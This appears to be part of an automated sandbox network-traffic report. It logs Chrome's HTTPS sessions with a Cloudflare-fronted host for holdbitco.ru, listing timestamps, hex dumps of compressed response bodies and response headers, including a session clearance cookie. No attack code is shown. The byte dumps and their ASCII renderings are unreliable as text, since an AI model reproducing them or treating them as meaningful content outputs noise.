                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC823INData Raw: b3 e3 e3 67 af 2d 2d ed 29 33 18 ca 7a f8 21 eb e5 25 5d b3 f7 dc 5c be fc e6 9e d9 5d 8d cf b3 cb b3 5b 86 67 cd 1e 6e cd ce 5e ba 67 d6 ac 3d 4b b3 c9 5a 5a 1d f4 e3 0f a0 1f 27 8f c7 0b fc 8e 78 3c d2 0d 76 31 01 f6 d1 78 0a ac ef 7a 78 4d 9e a5 ef e1 8e fd ef 64 1e 8f 18 aa cf 5f 56 91 60 28 5b 59 d2 30 14 72 38 e9 17 ea f2 5d 2f ae 5a fd d2 ce f2 e1 e1 ec 85 ad a9 8b f7 d6 cc de d3 92 d5 56 67 1e 3a 4c f8 be 10 e8 b2 da f3 9d e3 65 be 2b 68 10 a5 8d 8f 81 94 c5 e2 2a b0 17 11 2c 9d e3 f7 64 29 72 ac 1f b4 c8 29 df 91 5a 9f 6e 93 2e b1 59 6a e4 18 79 63 3d 9b 78 7d 55 eb b9 15 c0 f8 73 ad 2b 9f 4a 14 de 93 19 bf aa dc 60 28 5f 45 b6 77 9e b3 e3 fc 12 5c 73 e7 ab 89 ac 87 36 12 de 7f 04 bc 0f 81 f1 65 b1 4c 0d 0a c4 94 f7 3c 83 59 1e 37 da 0b 16 8d 9b
                                                                                                                                                                                                                                                                                                              Data Ascii: g--)3z!%]\][gn^g=KZZ'x<v1xzxMd_V`([Y0r8]/ZVg:Le+h*,d)r)Zn.Yjyc=x}Us+J`(_Ew\s6eL<Y7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC824INData Raw: 39 4d ac d5 be 8d 76 76 c9 98 fd 17 68 67 6e 10 f3 43 23 db 25 6a 07 bb 65 1c e6 5b ec 12 f5 78 bb 24 fd 7f b7 4b d8 5b 77 d6 e3 1a 7b c3 e4 b9 91 c3 93 34 92 ca 39 7e 93 ca 56 bd d8 32 37 17 4c 4d 13 15 62 4a 82 2d 6e f0 81 68 0a b6 ed c3 ab 69 6c 8c d4 bb 72 a8 22 fd cb 5e 30 c9 a0 7d ca 2f 5a 2f 05 51 4b e3 d5 4f 32 1d 41 f8 4f 25 9c 5e 14 96 e8 e3 3b 25 34 ab ab 2a f5 14 7b eb 9d 55 2b 95 fc 59 a5 2a a9 61 6f 83 40 f4 7f 31 d8 4c b3 80 36 03 b1 57 03 b4 1c 3b 2e 9e 35 d0 21 9e 35 24 c8 4f 03 1a d4 80 0c d2 f9 11 39 9c d5 c1 72 55 10 1e 12 01 42 ff 77 fa c7 29 db 8c fb 9a 96 2e bf fe cb eb c9 35 5b 67 6d 7d de b4 45 b7 a6 b6 be f9 c6 07 37 cc 8d bb d4 83 7d 85 0d 0b e7 16 b4 16 64 76 1f ca 69 2e 89 5d d6 54 54 30 6b 66 56 dd d4 9c 35 07 4a 56 55 18 a5
                                                                                                                                                                                                                                                                                                              Data Ascii: 9MvvhgnC#%je[x$K[w{49~V27LMbJ-nhilr"^0}/Z/QKO2AO%^;%4*{U+Y*ao@1L6W;.5!5$O9rUBw).5[gm}E7}dvi.]TT0kfV5JVU
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC825INData Raw: 67 89 78 63 56 89 1b 5d 90 ec 9c d3 3e 55 a1 09 ed 47 4c a6 39 35 d7 94 1b 67 d4 eb a4 6e 05 4d e0 fa 2d cb 22 0e 2c 10 e3 66 bf 73 a5 24 75 45 7d ee b4 e4 f8 fc e0 39 d1 2b cb 9b d6 64 64 6a 0c c6 ef 5a 3a 31 cf 9b 55 3b 35 2b 33 3a 06 38 d0 55 93 bb 12 24 67 dc 5a 0a 66 dc c1 4f 7d 95 df 43 ce 15 32 99 96 f4 c0 00 2f 77 ba 0a 27 bb a9 9e b2 f3 cc 2d 84 76 07 73 60 2a 84 06 fb fb 7a 7a 88 1e aa c2 d1 43 75 88 44 16 1b f8 b5 31 2b cb 08 3f 7d 67 eb 7a 2c 29 71 f9 d0 8b ab ca 9b 57 cf e7 5e cf 36 d2 af b2 ef 66 b1 9f 8f 04 86 ae 29 94 c8 5d 56 57 d1 47 7c 0d a1 8a fa 1a 64 9d 25 0d 72 22 96 06 72 73 36 93 8b e7 6d 56 ac e4 7b 80 ef 9a 93 95 92 64 8c 31 46 47 d2 93 cd 32 8f f5 0e dd e1 c9 8e 45 25 6b 1c dc 12 76 77 cc 8a ca c6 35 39 e9 ac bd 6b 52 31 3d b2
                                                                                                                                                                                                                                                                                                              Data Ascii: gxcV]>UGL95gnM-",fs$uE}9+ddjZ:1U;5+3:8U$gZfO}C2/w'-vs`*zzCuD1+?}gz,)qW^6f)]VWG|d%r"rs6mV{d1FG2E%kvw59kR1=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC827INData Raw: 19 bb 23 66 3c c7 84 a3 70 77 bb 55 97 74 79 e5 c5 6f fc ea cb df 87 8f 5d b8 20 ad bf 20 1f e1 ef 63 6b 30 48 bf e3 8c b8 0a 73 66 87 70 db 6e 1d e6 8a f0 1f f6 37 74 1d 66 a1 c5 d5 13 d8 ec 4b 7b c8 36 dc 10 12 1d 5f 2f 10 34 72 20 89 9c f3 51 f3 d0 43 21 b6 7e a1 dd a4 1d ff 75 ad 85 04 1c fa 31 7e 44 b3 a8 95 64 d9 c3 fe e4 97 38 2d c5 18 d8 2b 67 36 af e8 3f 40 f4 49 63 61 47 b4 bb f0 1f ee 0b eb a3 3b f7 1f d9 8b 67 8e 04 80 22 49 4d 11 2e 8c 8e da 68 c4 0a e6 e7 34 7e 08 e6 57 55 0a 8d 3b bc 2c 9e 6b e0 1e a4 f2 17 0b 8a 66 2b 7f 1c c6 77 8e 25 93 b8 ef ae 08 93 3d 0c 22 3c d2 71 1b 30 97 6a 55 e4 1a 05 b5 ed 7a 0c 6a 1a 06 d3 79 27 3a da 85 ec 03 3a 2c c2 89 67 33 e8 c4 f3 71 e2 c2 bd 0d 0d fb 0b e6 25 75 17 b4 b7 63 ee 8c 70 ef d9 eb ec ad 29 35
                                                                                                                                                                                                                                                                                                              Data Ascii: #f<pwUtyo] ck0Hsfpn7tfK{6_/4r QC!~u1~Dd8-+g6?@IcaG;g"IM.h4~WU;,kf+w%="<q0jUzjy'::,g3q%ucp)5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC828INData Raw: 2d 8d 51 16 31 c0 db 09 71 c3 04 33 df 56 3e d1 27 e8 87 13 ce 27 89 71 66 84 e7 d7 a5 ba 16 4c d0 57 40 3f 59 5f c1 92 3d 00 f4 4f a5 e9 6e 34 ef 0f e4 bc fd a3 55 60 cb ab 49 de 64 e9 68 1e f7 ca b8 7a ce ca d8 96 c9 ea a1 98 4b 32 a6 dd 29 e6 21 19 d3 89 13 26 60 e8 3a 0a ad eb 86 a4 23 a7 4e 90 6b 47 4c 8b 53 cc 1b 32 a6 cd 29 e6 92 8c 69 77 8a 39 2d 63 3a 9c 62 1e 92 31 9d 4e 31 7b 64 4c b7 0d 83 1d 31 35 32 66 85 d3 72 ae c9 98 56 67 e5 28 75 22 86 ea ae 1c 49 df a5 a3 9d 0e ba 6b a7 d4 c7 ce f2 b4 e0 69 df 91 27 78 42 9e 4e c8 e3 cc 06 19 eb bb b7 c7 f5 1d 3b 5e 4e f0 57 74 2c 3e 23 8d c5 67 68 fa 10 a4 ff 99 8e 75 31 bd 5d 4a 3f 28 78 90 d8 19 39 7d 15 33 42 d3 69 dc 0a ad eb 59 c9 56 7d 6b 82 bc 89 98 37 64 4c 9b 53 cc 25 19 d3 3e 19 06 c6 d9 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: -Q1q3V>''qfLW@?Y_=On4U`IdhzK2)!&`:#NkGLS2)iw9-c:b1N1{dL152frVg(u"Iki'xBN;^NWt,>#ghu1]J?(x9}3BiYV}k7dLS%>,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC829INData Raw: 88 43 e1 23 56 9d 54 35 20 e2 49 d5 3f 25 d7 2c a6 16 4c 07 f9 3d c5 3d cd b4 82 8e 70 63 82 2c 5a 2c 07 e0 90 ed 22 31 d6 86 75 88 b5 41 f1 39 39 f1 b1 39 39 dc d3 f4 10 48 6c 1c 09 4e c3 c2 9f b9 d7 a0 b3 76 40 39 5a 26 da 12 c9 63 10 29 46 ec 68 28 8c 1c 32 d1 a8 dd b5 1e da b1 00 1e d6 ae 50 9d dd ef 37 68 6c 4e 66 26 9a 2e fd c2 bd 96 69 34 64 65 19 e0 57 e9 13 64 f0 36 f7 11 52 83 ce 62 c9 dd d5 76 af 22 50 d5 50 61 a7 14 50 ba ce 4f b8 8d 23 b9 8f fa fa a0 bd 27 b9 67 98 45 a0 d7 bc 60 bc ba b3 64 bc a6 d1 fd 2d 3f 5a b7 3e 32 a6 6d 69 95 31 da 68 4a 33 24 e5 f0 39 15 5d 9e 4b 14 61 9a b4 e8 18 d3 0c ba e7 32 7a 54 f0 60 7a 40 07 fa d0 bb 5d 79 2c 3d 9d 50 2d 6d 04 21 66 56 54 2c 19 8b 5a e8 26 65 7a 46 46 ba de d6 b4 9e 08 73 79 7c 52 1c 9b 90 95
                                                                                                                                                                                                                                                                                                              Data Ascii: C#VT5 I?%,L==pc,Z,"1uA9999HlNv@9Z&c)Fh(2P7hlNf&.i4deWd6Rbv"PPaPO#'gE`d-?Z>2mi1hJ3$9]Ka2zT`z@]y,=P-m!fVT,Z&ezFFsy|R
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC831INData Raw: 1d 6d a9 fe 32 5a fc 5d 4e a3 f2 87 b3 d0 af d8 32 f1 4c d0 24 e5 8f 19 85 f6 f3 0b aa cc 9a 3d 3b 2b ab aa 0a 67 55 65 65 cd aa cc ce aa 02 f8 1b 30 77 dd 0b de 23 b5 2d 6d a5 88 a1 48 63 c5 f0 f6 c5 24 8b f3 50 9e da 36 23 51 0e 41 39 dc 5f 98 1f d2 39 50 cf 24 5b a6 f0 e4 9a 72 a6 5e c5 29 31 f8 6b e2 2b 19 64 0a 0c 0f 0d d0 07 ea ed 27 42 17 87 1a 74 4e 7e 47 c9 09 b9 b4 66 b4 49 9a 15 a5 5f f2 80 16 69 4e 74 fc 94 6c 85 db e8 01 fe 1e a0 d2 8b 49 b0 c4 92 f3 ff 36 7d 62 37 3f c3 dc 05 3d c3 79 f1 5e b2 77 a9 61 4d ac fd b4 6c 55 9f 86 9a c4 2a d1 51 f6 9b 11 a5 50 27 d7 84 99 9f 0b cd e8 02 b5 03 bc e8 fb 2a b6 63 7f 81 52 90 0f 43 0f 54 b9 03 13 dc bd dc bd ec 03 e5 91 6d f6 83 aa 34 e0 4d a0 9c 84 3c ca de 76 a8 91 fd c6 56 87 d0 34 a2 62 bf a6 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: m2Z]N2L$=;+gUee0w#-mHc$P6#QA9_9P$[r^)1k+d'BtN~GfI_iNtlI6}b7?=y^waMlU*QP'*cRCTm4M<vV4bm
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC832INData Raw: 3d ba 6c f1 32 68 b1 8b 6b 09 52 e1 99 88 51 91 23 07 5e c0 a5 4c 46 c1 60 95 02 b7 30 4a a5 8d 5b 3c 4f 23 99 69 68 67 60 99 3b 92 8e ab 48 ef 67 90 f0 66 0d 7d f5 85 1c fe c9 fe af f2 29 14 78 a1 78 b2 69 7c 09 da ff 97 14 90 7e ce 80 af 41 43 ba b0 cd df 59 90 43 ee 64 c8 6d 9a 98 5b e5 46 5e 22 58 ec ac 14 57 90 a0 14 30 d6 5d 5d 38 d7 e6 ff 32 37 59 55 25 86 bb ae 02 6c b1 f9 73 cb eb 2b ea 8b 66 e4 66 a7 26 c7 1a a3 f5 c1 81 7e 1a 30 23 cb 50 99 07 9d 0f a3 e8 03 36 3e 51 26 f1 29 08 1a ed 6f 1e 7f f8 87 cc 89 74 76 24 93 3e 8e 89 d2 47 72 0a 10 48 9f b1 3b 99 a4 17 36 e9 11 01 7f f6 c8 0f 84 ff fb 61 f3 fe 11 d4 f0 93 57 51 d6 87 bd 85 eb 1f 59 da b7 ce a5 e0 c9 8e aa 0d 55 c6 b9 fb 5f ea 6a da 11 1e 38 e4 65 4a 8d ca cd 2f 5d 3b 27 a1 e5 59 e1 cb
                                                                                                                                                                                                                                                                                                              Data Ascii: =l2hkRQ#^LF`0J[<O#ihg`;Hgf})xxi|~ACYCdm[F^"XW0]]827YU%ls+ff&~0#P6>Q&)otv$>GrH;6aWQYU_j8eJ/];'Y
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC833INData Raw: 2a ff f1 4f 8f ed ab 33 4b e6 79 08 31 31 b3 97 ee 59 5c b6 bd 11 12 f9 dc ba 0e 23 ba e6 de 3d f2 7e f7 96 24 81 73 ef 27 b2 bb 66 14 b1 1f 70 7f 64 c2 40 7e 8c 96 e8 e8 28 d2 2a 3f 1f b5 a7 1b 72 9f d0 aa 30 26 2c 84 2c 13 f2 e9 13 1b 23 59 45 d0 98 30 4c 5a 83 99 86 c3 ad 19 e6 a5 87 eb 7b 37 dc 30 1d 0f 69 2f 29 5b 16 78 38 fe e9 6d c2 a5 b0 ac 05 99 4b b7 8c 7e e1 36 6f e8 5a 47 e7 8d 1d f3 dc 6e df 76 df b3 29 7b 56 93 87 35 c8 bd a5 d2 dc 7f c0 e3 0b fc 65 f1 a6 c5 d3 3c f0 ef fc 6f 12 1a f6 8c de e6 1e e3 8f 31 59 4c 8d 65 7e 50 20 e6 14 e6 0c 0c 5a bf 54 89 38 15 58 f8 1c db 08 4a cd 15 21 37 e2 ff 28 14 f4 1c 3f 4c c4 6e 6e 4c bd bb 6d 45 24 2d 35 71 4a 42 3c 79 f8 97 3c 4a 49 0e 69 11 23 95 c9 42 59 1e b6 a7 29 f5 66 53 8c 78 aa dc 6c ca 63 ed
                                                                                                                                                                                                                                                                                                              Data Ascii: *O3Ky11Y\#=~$s'fpd@~(*?r0&,,#YE0LZ{70i/)[x8mK~6oZGnv){V5e<o1YLe~P ZT8XJ!7(?LnnLmE$-5qJB<y<JIi#BY)fSxlc
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC835INData Raw: 27 b0 8d d2 99 42 32 6b e7 99 a2 a3 02 dd 5c 95 93 3c 56 2c ae 03 c4 1a 22 23 0c 51 f4 a2 2c f9 ce 55 bb 33 c9 19 e6 89 ba 4a 5c 12 f0 f7 37 88 ef 41 1b 14 34 8d fd 2c af f3 c0 ec f2 7d bd d5 da a3 c6 03 ab d7 0d fc ec df 3f 4b 30 67 c4 e5 b4 ec aa 18 78 29 65 8b 7e 63 c3 aa 35 6f 7f f5 76 82 d9 1c fb 61 6c 42 cd c0 e9 c2 78 43 ed e0 29 a4 98 d1 51 14 a5 9b b1 ac 34 b1 6b 71 55 71 c3 cc c2 75 c3 d9 4b 52 8c f5 e9 d3 ba ca 62 5b 66 97 59 0a 17 5a 6a 4b 8a 37 ee cb 5a 9c 9a 58 f7 b2 76 66 82 a5 c2 64 0c 0e 9c 13 93 57 96 6a 24 6d 5e 35 ea ca fe 11 fa c6 83 51 93 1d 65 12 09 85 57 33 76 61 22 44 50 e8 4d 66 72 c0 0b d9 65 83 1f 9c 5e fd e0 a6 f2 f2 4d 0f 56 f7 f4 a0 a9 ab 57 e3 15 e9 ad 47 1a 1a 8e b4 a6 7f b3 43 b1 e1 9b 1d e2 9e f1 b3 ec 3c 7c 07 c6 39 b1
                                                                                                                                                                                                                                                                                                              Data Ascii: 'B2k\<V,"#Q,U3J\7A4,}?K0gx)e~c5ovalBxC)Q4kqUquKRb[fYZjK7ZXvfdWj$m^5QeW3va"DPMfre^MVWGC<|9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC836INData Raw: 69 f1 ae 79 ad a7 e2 92 5e da da 7e ba 2d 8d 2d d1 e5 2e 48 cf a8 99 aa 0b cd 9a 9f b9 6c 87 b5 58 5f d4 59 3c ad 73 a6 c1 30 b3 63 5a 71 57 91 1e fa bb 19 78 99 0a 7c 20 72 90 61 01 a7 8a 5c 87 0d 5d 0f 5a 8a 65 88 fc da 6f 38 60 90 03 46 92 03 12 c8 61 f4 05 4d 11 af 43 a0 8c 1d f6 17 26 5c 7c 35 80 a6 93 ce bf 40 3a ff 5a 5b eb 93 03 15 89 26 a1 db 6d 7a 5f 2d 91 82 19 05 a2 34 60 77 b5 17 f4 fd 3a b1 ef 4b b7 3c 4c 44 c2 ba 18 6f 4c ad 96 a4 40 fa 24 51 26 e4 2d 0e 15 b1 35 5d 98 50 e8 c5 74 c6 c3 e2 9a 96 6a 08 d3 b8 f2 0c 97 4c ee 4b a5 c1 37 f0 ff ef 9a a9 61 98 bd ff 10 be 78 f6 11 eb c2 b3 8a 85 f5 c7 97 e5 e6 2e 3b 5e 5f 77 62 d9 d4 a9 cb 4e d4 15 2c 2d 8a 22 ea 47 fa 14 9e c6 a3 56 c4 ef b8 bb 93 eb bf b3 81 db 70 77 07 ca 9f b1 f6 6c 5d ed e9
                                                                                                                                                                                                                                                                                                              Data Ascii: iy^~--.HlX_Y<s0cZqWx| ra\]Zeo8`FaMC&\|5@:Z[&mz_-4`w:K<LDoL@$Q&-5]PtjLK7ax.;^_wbN,-"GVpwl]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC837INData Raw: b5 86 7e ff 5a c3 bf 7f ad d1 df b7 56 4b 0a 7c e5 29 8e be 49 f3 4f cc 63 37 04 d3 6b 6b 2a ca 6d c3 70 71 43 4d 73 6d f3 dc aa f2 ea 8a ea e9 d3 32 cb b2 ca 26 0e 48 b5 b7 af 34 67 68 fe 87 d1 a8 73 f8 3b da 0e ab b3 fb 9d 2b 83 71 3a 50 fc df 0e 54 5c e5 90 60 9d 2a 41 f1 3b d2 2f fc f1 ff 71 08 3b 1d d2 76 43 1b 3c 13 18 db ae 8f 8d 1b db 8b 99 2e a6 8f 19 60 fd c4 f1 4d 96 c8 95 6a 2f 0c 86 a2 87 7d 77 f8 d0 ee d4 d0 ee 0c f4 0e f0 d4 f2 ee ee a8 de df f5 ff 99 28 87 08 1b 1b 72 2e 27 d3 00 44 5e a7 c8 05 a2 94 ba 40 9c 52 17 48 52 ea 02 69 4a 5d 20 4b a9 0b e4 29 75 81 2a 65 2e 70 30 07 4a 0b 41 ca 06 1c a6 60 d7 89 54 42 b8 56 56 e4 e6 24 26 20 4a 89 fa da 8a e6 ca e6 e2 c2 9c f2 dc f2 f4 d4 84 ec c4 ec f0 50 9f 78 df 78 dc 25 86 14 15 4a 0c 62 4b
                                                                                                                                                                                                                                                                                                              Data Ascii: ~ZVK|)IOc7kk*mpqCMsm2&H4ghs;+q:PT\`*A;/q;vC<.`Mj/}w(r.'D^@RHRiJ] K)u*e.p0JA`TBVV$& JPxx%JbK
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC839INData Raw: 13 15 1c ef c0 42 dd cf b6 8c f3 bc ae 7b d8 4e c1 26 b5 9f ad 40 b3 ba c9 6b 9b f1 a2 fa 06 73 f4 46 9c d0 4b 51 1c 1f e0 9a c7 51 aa 13 28 d4 d3 50 19 7f d4 ff cd bd 87 66 13 cf c6 bc 6f f7 5e 61 ef ef 47 8d f5 1d 2a 18 a3 dc 51 bc 8f 31 d4 c7 c4 3d 9d 11 78 93 fb e0 4d 6a 83 e7 5e 62 cc 27 38 9e 0e 2f de c8 67 09 f6 9b 08 f3 4c f6 7f 47 e5 f2 30 0e 26 5f 61 d9 dc f9 b7 4d fe d8 de 0b dc a5 3f 38 77 86 f2 68 9a c9 6d 38 bf aa 24 50 96 cd 73 94 c9 fb ff 12 21 2a a8 4f 8e a9 53 14 73 9c 63 eb 31 01 a6 de 61 b6 ee 51 3c 07 61 b9 9a aa 62 94 ab 3e a4 54 0c d5 6c 6b 39 ae 16 07 f0 98 ea 67 bf 05 a9 d8 1d ec a1 54 ec ae df 67 a8 85 76 2e e5 fc ce 35 2d 56 85 5d cf b5 52 23 25 3f c5 52 71 16 85 9c ff 44 5e 47 81 ce 60 8e bc cd 31 90 27 47 b0 c2 39 85 f2 f8 ab
                                                                                                                                                                                                                                                                                                              Data Ascii: B{N&@ksFKQQ(Pfo^aG*Q1=xMj^b'8/gLG0&_aM?8whm8$Ps!*OSsc1aQ<ab>Tlk9gTgv.5-V]R#%?RqD^G`1'G9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC840INData Raw: cf f2 52 43 d7 84 6b 52 35 9b 35 a7 b5 cb af 99 d7 33 56 83 75 ce 5a 78 f3 fb 9b 0d 9a a3 b7 e8 87 3a 5b 5d b8 6e a7 3e 58 9f 6d 60 1a 52 0d 27 0d 67 0d 97 36 60 4b 34 ea 1a 13 8d 17 8d c5 c6 47 46 cb 18 19 86 51 99 6e a6 9f 19 63 a6 98 45 26 cb ec 32 27 4c 91 d5 b1 56 56 65 63 ec 00 3b ce 4e b3 4b ec 06 bb c3 fe c5 fe c3 5e b3 cf 1c cc 59 39 3b e7 e7 de 72 c3 dc 14 b7 c2 7d e6 0e b9 33 ae c8 fd e0 51 de c2 33 bc 83 f7 f2 dd 7c 0f 3f c4 8f f1 93 7c 9a 5f e4 57 f9 8f fc 2e 7f c4 17 f8 1b fe 45 a8 14 68 c1 21 04 84 1e 61 44 98 14 e6 85 55 61 5b 38 10 4e 85 2b e1 49 24 45 49 0c 8a bd 62 5c 1c 17 ff 14 df 8b 6b e2 8e b8 2f e6 c5 73 f1 5a 7c 90 0c 92 59 12 24 8f 14 96 06 a5 84 34 23 7d 90 36 a5 03 e9 5c 7a 94 71 b9 56 e6 64 45 f6 c9 31 39 2e 4f c8 b3 f2 8a bc
                                                                                                                                                                                                                                                                                                              Data Ascii: RCkR553VuZx:[]n>Xm`R'g6`K4GFQncE&2'LVVec;NK^Y9;r}3Q3|?|_W.Eh!aDUa[8N+I$EIb\k/sZ|Y$4#}6\zqVdE19.O
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC841INData Raw: b1 1d b6 c7 0e d8 11 3b 61 67 ec 82 5d 51 87 dd 50 8f 08 a2 68 40 23 9a d0 8c 16 b4 62 21 76 c7 1e d8 13 7b 61 25 ee 42 86 95 ac a2 c2 00 ab f1 13 6b f0 35 56 31 88 bf 33 c4 30 6b 39 97 f3 38 9f 6b 71 6d 2e c0 ed 78 19 2f 72 1d ae 8b 3b 30 c2 f5 b8 3e 37 e0 86 dc 88 1b 73 13 6e 8a ff 71 33 fc ce cd 91 e5 16 78 15 1a 5e e2 96 dc 8a 5b 73 1b bc c2 6d b9 1d b7 e7 0e dc 11 bf 71 27 ee cc 5d f0 26 5e c3 eb dc 95 75 dc 0d ff c6 1b ac 67 84 51 36 b0 91 4d 6c 66 0b 5b b9 10 a3 dc 9d 7b e0 5d bc c5 3d f1 36 f7 e2 de b8 13 39 ee c3 7d 19 63 9c 09 26 99 62 1b db b9 08 df b2 03 ff 61 27 17 b3 0b 1f e0 3d ee 87 f7 d9 cd 1e ee 8f 3c 0f 60 2f fb d8 cf 34 0f e4 00 0f e2 20 87 78 30 7e e1 21 78 94 87 f2 30 0e e3 7b 1e 4e 95 23 48 22 85 36 b4 63 11 3a d0 89 c5 e8 c2 87 d8
                                                                                                                                                                                                                                                                                                              Data Ascii: ;ag]QPh@#b!v{a%Bk5V130k98kqm.x/r;0>7snq3x^[smq']&^ugQ6Mlf[{]=69}c&ba'=<`/4 x0~!x0{N#H"6c:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC843INData Raw: ca c1 90 2d 2d 7a 2d ad 2a 96 06 a9 b6 b8 26 59 57 5f f2 1b 9e 94 73 99 6c 96 d8 aa 4c 0a dd 4d 0a 52 93 3e dd 4d ce ea 6e 4a e8 6e ca a7 bb 29 a1 bb 69 e1 36 ed 1b 85 e9 35 75 d7 1c f4 38 d7 2d d5 6c a7 66 76 d4 e7 7b e5 39 45 db d4 b2 ea 88 e5 86 f7 bf 65 de b2 cd 6a 2f 6b 66 62 a4 da 73 70 17 f3 fc 95 b9 76 ad 17 d8 5d 78 b1 6b cb 24 4a 4e 33 67 d5 5e ab 4a 0b 8f b2 bb 08 94 48 b8 18 9e 25 53 32 66 69 bb 46 68 a6 74 77 5d 23 7a ec ae 16 ac 49 d9 dd 9b eb 63 ed 9a 41 f9 4e 25 3f f1 cd 28 e5 2b 55 53 3a 2c 58 a3 4e 7e ca 1d 3a ef db 1d ad 8f 34 55 a6 8a b6 25 8c 78 83 c4 46 89 ad 12 93 12 bd 41 8b 46 22 cd c2 6e 10 76 b4 5e d8 91 68 f3 1f db 70 b4 aa 00 01 00 01 ff ff 00 0f 78 da 63 60 c0 02 96 01 61 0f 43 0f 6b 1b 03 03 6b 1b f3 0b 06 86 7f 49 1c fb ff
                                                                                                                                                                                                                                                                                                              Data Ascii: --z-*&YW_slLMR>MnJn)i65u8-lfv{9Eej/kfbspv]xk$JN3g^JH%S2fiFhtw]#zIcAN%?(+US:,XN~:4U%xFAF"nv^hpxc`aCkkI
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC844INData Raw: 79 a1 84 d5 9d f1 0f 79 9a a8 93 2a 78 90 19 c9 65 7c 73 60 81 33 4c 4d c0 5f fa 57 5d 1c a6 72 13 f3 a0 ca 51 6b 62 a8 d7 fd 6a 5c d5 17 d1 80 b7 46 db 9d f1 ed ad 97 d9 27 72 6e 2b aa 55 4e bc d4 56 74 ad 12 41 31 17 0b ac 3d ce 41 5a aa 54 05 d5 19 55 d8 30 ba 5c 5c 12 a5 5e 45 93 a4 d7 35 30 34 30 ff 5f a3 14 5b ff 57 f5 b1 f9 3c 5f ea 12 23 64 2c df a6 3f b0 d1 e5 60 0c fd 6f b2 ff a6 1c 04 60 e0 c7 c8 e5 16 5c 5e 4a 9b 13 bf 0c d0 87 0b 55 ba 8c 5e fc f8 94 fd 3b 98 b9 fa e2 02 5d 01 be ab e8 2a 44 9b a3 e6 22 ae a2 89 cf e0 30 4e 9f 28 2e 47 6a 03 7e aa fa 98 33 00 9f 01 e8 0c 3e 57 7d 3d d9 e9 00 24 3b db cc 71 01 76 98 c3 60 97 39 0c f6 98 c3 60 9f 39 b7 01 be 60 0e 83 2f 99 c3 c0 63 0e 03 9f 39 0e c0 3d e6 30 b8 cf 1c 06 5f 31 87 c1 03 e6 34 01
                                                                                                                                                                                                                                                                                                              Data Ascii: yy*xe|s`3LM_W]rQkbj\F'rn+UNVtA1=AZTU0\\^E5040_[W<_#d,?`o`\^JU^;]*D"0N(.Gj~3>W}=$;qv`9`9`/c9=0_14


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              71104.21.0.95443192.168.2.1649803C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC845INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:40 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Set-Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; path=/; expires=Thu, 24-Oct-24 16:27:40 GMT; domain=.holdbitco.ru; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tBxlTjONo2jJya%2BxUsMmwyUrEJ4IIL438nrR9M5%2F65yXSxJokR2x8g3ElN%2BHieCkmDKVqXPt2dkgo6NHlCeZBz8dP1JoeSkYrEnWUOu04Q95lwd6ouQRpO7%2Fo%2FAhYLKfpoabStAd0B1WsunA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd40789400826-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC846INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              72104.21.0.95443192.168.2.1649799C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC846INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:40 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                              Content-Length: 28584
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 25 Aug 2023 04:00:25 GMT
                                                                                                                                                                                                                                                                                                              ETag: "6fa8-603b76269b664"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
